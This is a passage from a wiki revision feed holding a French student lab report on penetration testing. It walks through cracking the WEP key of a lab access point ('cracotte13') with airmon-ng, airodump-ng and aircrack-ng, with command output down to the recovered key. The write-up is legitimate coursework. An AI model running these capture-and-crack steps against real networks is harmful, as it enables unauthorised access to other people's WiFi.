    PHY	Interface	Driver		Chipset&lt;br /&gt;
    phy2	wlx40a5ef0f68cb	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
    Interface wlx40a5ef0f68cbmon is too long for linux so it will be renamed to the old style (wlan#) name.&lt;br /&gt;
            (mac80211 monitor mode vif enabled on [phy2]wlan0mon&lt;br /&gt;
            (mac80211 station mode vif disabled for [phy2]wlx40a5ef0f68cb)&lt;br /&gt;
&lt;br /&gt;
Le nom a été changé car l'ancien était trop long, l'interface s'appelle maintenant wlan0mon.&lt;br /&gt;
&lt;br /&gt;
On peut obtenir le canal et l'adresse MAC de la cracotte qui nous intéresse (ici, la cracotte13) grâce à la commande :&lt;br /&gt;
    root@zabeth09:~# airmon-ng --encrypt wep wlan0mon&lt;br /&gt;
    BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -34        5       37    9   3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On peut lire que la cracotte13 est sur le canal 3 et que son adresse MAC est 04:DA:D2:9C:50:5C.&lt;br /&gt;
&lt;br /&gt;
On récupère ensuite dans un fichier &amp;quot;lcrack&amp;quot; toutes les données concernants la cracotte13 qui transitent sur le canal 3:&lt;br /&gt;
    airodump-ng -w lcrack --channel 3 --bssid 04:DA:D2:9C:50:5C wlan0mon&lt;br /&gt;
&lt;br /&gt;
On attend d'avoir un nombre suffisant de données (environ 40000 pour ma part) :&lt;br /&gt;
    BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
    04:DA:D2:9C:50:5C  -38   0      3776    40132  115  3  54e. WEP  WEP         cracotte13&lt;br /&gt;
&lt;br /&gt;
On lance ensuite la commande permettant de craquer le mot de passe grâce aux données récupérées :&lt;br /&gt;
    aircrack-ng lcrack.cap&lt;br /&gt;
&lt;br /&gt;
On obtient rapidement la clé WEP :&lt;br /&gt;
                                                                                     Aircrack-ng 1.5.2 &lt;br /&gt;
                                                                        [00:00:00] Tested 829 keys (got 263651 IVs)&lt;br /&gt;
    KB    depth   byte(vote)&lt;br /&gt;
    0    2/  3   73(281856) D8(281088) 0E(278016) 7D(278016) DF(276736) 18(276480) 19(276480) 4F(276480) D7(275968) 5C(275712) 9D(275456) D2(275200) B8(274688) 4A(274432) 76(274432) &lt;br /&gt;
    1    5/  1   38(282368) 91(278784) DE(276992) 80(276736) E0(276736) 66(276480) 4C(275456) 89(275456) D9(275456) 98(275200) 53(274944) D7(274944) 39(274432) D3(274432) 1D(274176) &lt;br /&gt;
    2    2/  9   37(285696) 90(280832) CF(280064) FC(278272) 03(278016) 6E(278016) DE(278016) DB(277760) FD(277760) C2(277504) 60(276480) 62(276224) 73(275968) CB(275968) DA(275456) &lt;br /&gt;
    3    0/  1   14(373248) A1(285952) F7(284672) F4(284416) AE(283648) FC(281344) 5C(280832) F9(279552) 55(279040) 29(278528) 03(277248) 06(276736) 53(276480) 66(275456) B6(275456) &lt;br /&gt;
    4   32/  4   F3(273152) 12(272896) 9A(272896) 45(272640) E2(272640) 4E(272384) B4(272384) 65(271872) 23(271616) 89(271360) 1C(270848) 1F(270592) B9(270592) FC(270592) 06(270336) &lt;br /&gt;
             KEY FOUND! [ 12:34:56:78:9A:BC:14:CB:A9:87:65:43:21 ]&lt;br /&gt;
    Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56411</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56411"/>
				<updated>2021-11-19T11:44:35Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== '''5. Tests d’intrusion''' ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56025</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56025"/>
				<updated>2021-09-30T11:23:18Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : Page blanchie&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56024</id>
		<title>TP sysres IMA2a5 2021/2022 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G6&amp;diff=56024"/>
				<updated>2021-09-30T11:23:08Z</updated>
		
		<summary type="html">&lt;p&gt;Nerceau : Page créée avec « wikipédia »&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;wikipédia&lt;/div&gt;</summary>
		<author><name>Nerceau</name></author>	</entry>

	</feed>